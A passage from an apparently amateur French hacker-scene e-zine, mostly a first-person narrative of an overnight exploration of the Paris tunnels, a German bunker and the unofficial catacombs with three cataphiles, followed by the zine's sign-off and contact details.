calcul et vous etes empale. Et ces gars bougent vraiment vite. Cela ne prend pas longtemps pour que je comprenne le probleme. Vous devez suivre la personne qui se tient devant vous. La postluminescence de sa torche eclaire votre voie. Et dans notre prochain tunnel le plafond est irregulier et beaucoup plus bas. Nous nous tapissons, marchant comme des singes. J' essaie de marcher dans les pas de mon predecesseur, comme dans la neige. Nous marchons dans l' eau, profonde d' environ 40 cm. J' essaie de regler ma respiration, et de ne pas tomber.C'est beaucoup plus dur que ce que j' avais imagine. Une fois hors de l' eau, le plafond baissa considerablement. Apres 20 mn de marche, ce labyrinthe devient incroyable. Il y a beaucoup de tunnels, beaucoup de choix. Si je les perd ou que je traine, je ne retrouverai jamais mon chemin arriere. Je pourrais etre delaisse ici a tourner pour toujours. Heureusement mes guides savent ou ils vont. Je n' ai qu' a continuer. Mais c' est dur. Il y a tellement de choses a voir, et ils ne s' arrentent que pour les choses les plus etranges.Comme preciser et commenter le detail architectural le plus mysterieux. Les pierres angulaires avec les noms et les dates de rue m'intriguent. Elles sont belles et changent d'une manière extravagante de 1777 à 1890. Mais mes guides parlent de la construction anarchique du tunnel. Et ils montrent les graffitis des periodes revolutionnaires - 1789 et 1968. C'est trop étrange! Il n' y a pas de SDF ici. C' est trop secret, et la police a scelle toutes les entrees a l' interieur de la ville. J' entends quelque chose - musique? Je demande aux autres de s' arreter. Silence. Ils ne me croient pas. Nous avoncons de quelques pas, et ils commencent eux aussi a l' entendre. Emmanuel me pousse pour se rapprocher de la source sonore. Nous ecoutons. Aucun son. Mais une lumiere s' approche, accompagnee de voix eloignees. Emmanuel me regarde. "C' est de l' anglais?". Avant que je ne puisse repondre, il maudit les touristes. Quatre types, quatre filles. Ils amorcent un sourire, et nous saluent dans un anglais casse. " Avez-vous vu la police? " Nope. " Elle nous a chassee à 'La Plage' ." Emmanuel semble dubitatif. Ces débutants sont fiers, ils viennent directement d'Allemagne. Emmanuel se dirige vers moi, et dit " Eh bien, il est Canadien." Le leader appelle Emmanuel-frère. " Il n'aime pas cela et il reste assez froid avec eux. Ils le sentent et restent distants aussi. J'ai jeté un coup d'oeil sur la carte de leur guide. Elle etait vieille et limitee. Emmanuel verifia que ces touristes ne nous suivaient pas. Pendant que nous marchons, Emmanuel a cette habitude de regarder et verifier le moindre trou dans les parois. Je devine qu' il y avait autrefois des bougies et des statues religieuses gardees la, mais personnelement, je prefere ne pas y aventurer mes mains. Finalement il s' arrete et recupere un morceau de papier au sol. C' est un tract sur l' extreme speleo/cataphile. C' est vieux et humide. Emmanuel le garde pour sa collection. Il a des centaines de dessins, schemas, magazines, laisses par les visiteurs. Ma montre est cachee dans ma poche, ce qui la protege des murs erailles, mais je n' ai vraiment aucune envie de savoir quelle heure il est. Nous rentrons a temps, mais par chemin quelque peu illogique. Il y a des milliers de km de souterrain ici. Nous sommes dans un musee sous-terrain, mais les expositions sont hors chronologie, 1850, 1777, 1941... J' apercois a present un grafiti fluorescent - l' annee derniere, la semaine derniere, hier? Apres une longue ligne droite, Stephane montre un trou dans une paroi du tunnel. "Bunker - plus tard". Heureusement ces types s'arpentent. Il est temps de se reposer. Nous entrons dans une petite caverne. Une fois que nous l'avons eclairee avec des bougies et des lampes mes guides s'embarquent sur un exercice des plus curieux - plantant des piquets et broyants les pilliers soutenant cette cave en forme de piece. Ceci me semble assez dangereux. Cet endroit est creuse dans de la roche incertaine et les piliers sont seulement des pierres empilées les unes sur les autres. Et, a chaque coup, les parties du plafond semblent se desagreger et tomber sur nous. Je me retire a l'entree, pret a plonger dehors dans le tunnel, plus sur. Stephane est le premier a reussir et etire une bache entre deux piquets. Il s' etend soigneusement dans son hamac improvise tout en souriant pendant que les autres continuent et echouent malheureusement. Alors un de ses 2 piquets vole soudainement hors du mur, et il s' ecrase lamentablement sur le dur sol de la caverne. Nous sommes tous morts de rire. Je suis sous Paris avec les trois faire-valoir francais. Pour le diner, ils chauffent des boites de confit de canard et sortent du pain et du vin. J'offre de l' eau et des barres energetiques. Ils me regardent curieusement. Jean Baptiste: " hachish? " Je leur suggere de les garder pour le dessert ;) Stephane est un garcon curieux. Il a passe 4 ans a fusionner des cartes techniques (je ne me demande meme pas pourquoi ou comment il les a obtenues) avec ses propres explorations sous-terraines. Toutes les fois que nous trouvons quelque chose de nouveau, ou quelque chose d' etrange, il l' annote sur un cahier. La carte entière est un fichier géant de Photoshop qu'il a imprimé en Suisse. Alors qu'elle est noire et blanche, elle montre plus de six niveaux. Le reve de Stephane est de produire une version en couleur. Pourquoi la fait-il? Puisque personne d'autre ne l' a fait. Puisqu'il est la. Et a propos de sa famille? Il a deja emmene deux de ces gamins dans des caves. Ils ont aime. Emmanuel nous decrit une rencontre avec un couple plutot etrange et un enfant de 10 ans dans les tunnels l' annee derniere. Je demande si c' est frequent qu' ils rencontrent des gens ici. Souvent personne, parfois un ou deux voyageurs. Aucun d'eux n'a rencontré la police redoutee du tunnel. Emmanuel est sceptique a propos de la course-poursuite des allemands. Je lui demande s' il n' est jamais devenu un peu fou. Il me repond que ca lui etait deja arrive d' entendre du reggae et de voir des lumieres quand il venait seul. Jean Baptiste est d' un type plus silencieux; plus jeune que Stephane, moins obsede. Il me confie qu' il a une liberte ici qui n'existe pas en haut. Et j'ai le sentiment que c' est un homme différent ici. Lors des voyages de camping vous vous asseyez en arriere et ecoutez le vent dans les arbres ou les animaux eloignes. Vous vous prenez dans le silence noir. Je ne sais pas pour combien de temps nous nous asseyons la. Le Bunker La methode pour entrer est assez simple, mais c' est aussi comique: vous passez la tete la premiere, et votre coequipier vous pousse a travers. Les tunnels changent encore d' architecture. Nous sommes censes etre sous un lycee. Nous sommes censément sous un lycée. Je devine que les gosses ne se rendent jamais ici. Mais les Allemands l' ont fait. La plupart des vestiges des Nazis sont maintenant partis du bunker, mais il reste des avertissements, comme " RAUCHEN VERBOTEN ", et des portes scellees en metal qui ressemblent a celles d' un sous-marin U2. Et il y a beaucoup de salles - petites salles. Je n' ose imaginer a quoi elles servaient. Emmanuel sort du tunnel pour entrer dans un Bunker. Il y a beaucoup de cables electriques et de conduits montes sur les murs - ce qui me laisse penser que c' etait un Bunker de transmissions. Mes yeux commencent a s' acoutumer, et je peux observer une trame de metal blanc dans une autre piece. Les lamelles en bois se sont desagregees et se sont dissoutes dans le plancher en pierre. Tout le monde est silencieux, chacun observe seul. Stephane se dirige a une fissure dans le mur. Je suis sur de ne pas passer cette fois, mais il y est deja parti. Les autres regardent pour voir si je suivrai. Je me lance finalement, apres avoir jete mon sac a terre. Il faut grimper, puis ramper vers le bas. J' ai environ 10 cm de jeu de chaque cote. Je ne me suis jamais autant senti enterre vivant. Et il n'y a aucune extremite en vue. La plus legere secousse, et nous sommes tous ecrases. Personne ne nous entendra. Personne ne nous trouvera. Pourquoi est-ce que je fais ca? Je n'ai pas le temps de repondre. Il y a un type derrière moi et je dois continuer. Je figure que nous rampons 6 ou 7 m avant la sortie. Je peux gouter la poussiere. Mes nerfs me massacrent. Mais nous retrouvons le sourire a la sortie. Ce stupide sourire que les hommes esquissent lorsqu' ils ont fait quelque chose de viril ensemble. Nous sommes de retour dans les tunnels. Nouveaux Tunnels? Je me depeche pour rattraper mes trois camarades a la prochaine intersection. Il n'y a aucun repere de rue. Stephane etudie sa carte. Jean Baptiste la saisit, la tourne a 180 degres - le signe international du désaccord spatial. Ils discutent. Je n'ai besoin d'aucune traduction. Je sais qu'aucun d'eux ne porte une boussole. Clairement, nous sommes detruits. La plupart des hommes paniqueraient. Ces trois-ci sont hyper-joyeux. Territoire inconnu! Stephane me sourit. En me prenant avec eux, ils ont ete recompenses. J'ai porte bonheur. Je suis neanmoins tres inquiet, et mes genoux tremblent. Nous sommes de veritables explorateurs maintenant. A chaque intersection, Stephane trace une serie de lignes sur sa carte. Ces tunnels semblent... differents. Ils ne sont pas lisses, et il y a des signes d' eboulements. Emmanuel pousse tout a coup un cri aigu, et me dit de m' approcher. Il est suspendu au-dessus d' un bassin d' eau totalement claire. Il me dit que personne n' est venu ici depuis tres longtemps. Comme nos cartographes continuent leur travail, je me tourne vers Emmanuel pour quelques renseignements. Il me raconte que ce sont des tunnels d' essais, pour controler les fondations des batiments voisins et l' uniformite de la terre. Ils ont probablement estime qu' il etait trop dangereux de les construire ici. Stephane est si fier de sa nouvelle decouverte. La fatigue me gange, les grimaces aussi. Meme ces types ont leurs limites. Les boulots en surface et la colere des epouses fachees reviennent en memoire. Mais Emmanuel est honorable en un point. Il me demande si je veux toujours voir les vraies catacombes? Je ne me demonte pas. " Mais bien sur ", je réponds. Les autres sourient, fiers de moi. Mais ils pensent a leurs foyers. Les vraies Catacombes Il n' y eut plus beaucoup d' arrets, ainsi quand celui-ci s' est presente de lui-meme, nous nous sommes assis. Au milieu de la salle se trouve un escalier miniature, une sculpture. Quelque chose de fait avec les 15 genres de pierre de la zone. Stephane et Jean Baptiste se concentrent pour fournir a Emmanuel les sections adequates de la carte pour faciliter notre retour. J'entends encore cette musique. Mais avant que je ne puisse reagir, ils etaient la - nos huit touristes allemands continuant leur chemin. Ils nous rejoignent et choisissent Emmanuel pour prendre leur photo. Puis, de nouveau, ils partirent aussi rapidement qu'ils etaient apparus. Nous observons leur lumière disparaitre en bas du mur de tunnel. Nous zig-zagons pendant un moment puis suivons alors quelques escaliers en pierre antiques vers un autre niveau. Les vrais catacombes ne sont pas aussi ordonnees que la version des touristes. Aucunes croix faites à partir des lignes des crânes ici. Des os sont repandus aux environs. Alors Emmanuel me montre les galeries laterales. Les os ont ete empiles pour toujours sur 60 a 80 cm de hauteur dans des tunnels qui vont... dans l'obscurité. Il y a une paire de gants de latex a l'entree. Emmanuel est silencieux. C'est l' endroit ou les tares viennent, me dit-il. J' ai peur de demander pourquoi. Il semble que quelques-uns prennent leur pied a se jeter sur ce tas d' os. Surfer dans le puits de l' humanite. Je regrette de ne pas avoir demande maintenant. Tellement de choses a voir, si peu de temps. Mais nous pensons a nos foyers. Peut-etre une heure et demie si nous nous deplacons vite. Mais Emmanuel est nerveux. Il veut eviter 'La Plage', vu que les Allemands les ont avertis que les flics rodaient dans ce coin. Nous n' allons prendre aucun risque, et nous empruntons un detour. Mon guide est finalement heureux de pouvoir controler. Plusieurs fois Emmanuel regarde sa carte. Puis soudainement deux jeunes types - d' une vingtaine d' annees - passent. Ce sont des hommes en mission. Un simple " Salut " et ils continuent leur chemin. Emmanuel montre peu d'interet a les suivre. Nous continuons sur notre chemin, mais nous sommes perdus pendant un moment. Enfin il consulte la carte une fois de plus, puis m'assure que nous sommes seulement a une demi-heure de la fin. Quand nous frappons l'eau il tout revient. Cette fois je glisse. Nous nous precipitons. Je suis fatigue, impatient. Je me cogne la tete. Emmanuel se retourne, il l'a entendu. Je sens le sang mais j'incline la tete et nous continuons en fonction. Je prends appuis avec ma main sur le mur, en evitant les metaux. On se trouvait a present dehors. Emmanuel me laisse partir. Triste de dire " au revoir " a mon guide, mon aventurier de camarade, mais nous sommes tous les deux fatigues. Et il est un homme de peu de mots. Nous sourions, inclinons la tete. " A la prochaine". " A plus tard ". Emmanuel conduit en surface comme il voyage en-dessous. Des cris, des manifestations etranges. Je suis sur un des premiers trains du nord. Mes cheveux sont en desordre, je suis couvert de salete. C'est une merveille qu'ils ne m'arretent pas. Mais personne n' en prend note. J'ai juste passe dix heures sous Paris avec un groupe de cataphiles fous, de trafiquants de drogue et de touristes extremes. Devant moi maintenant, premiers banlieusards de matin. Je sais que je suis remonte, mais alors que le metro accelere je me rappelle ou je suis vraiment. Il n' y a juste qu' une foule en plus, mais nous sommes encore sous terre. [ pour vous servir: vatoo] (¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯) ) Ze End !!! ) 2.13 ( vatoo ( (_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_) Voila pour ce deuxieme numero de notre zine. On espere sincerement qu' il vous aura plu, que vous lui ferez de la pub, que vous lirez le prochain, et surtout que vous participiez! On insiste bien sur le fait que vous pouvez nous contatcer tres librement, en venant sur notre chann (#cryptel / IRCNet), en vous exprimant sur le forum de notre site (http://www.altern.org/cryptel bah oui, notre domaine est mort :( ), ou en nous envoyant un petit mail a cryptel@altern.org . . . Si vous avez des idees originales d' articles, des sujets, des demandes, ou des textes a nous soumettre, c' est cette email qu' il faut utiliser. And don' t forget to defonce your head the 31 december!!!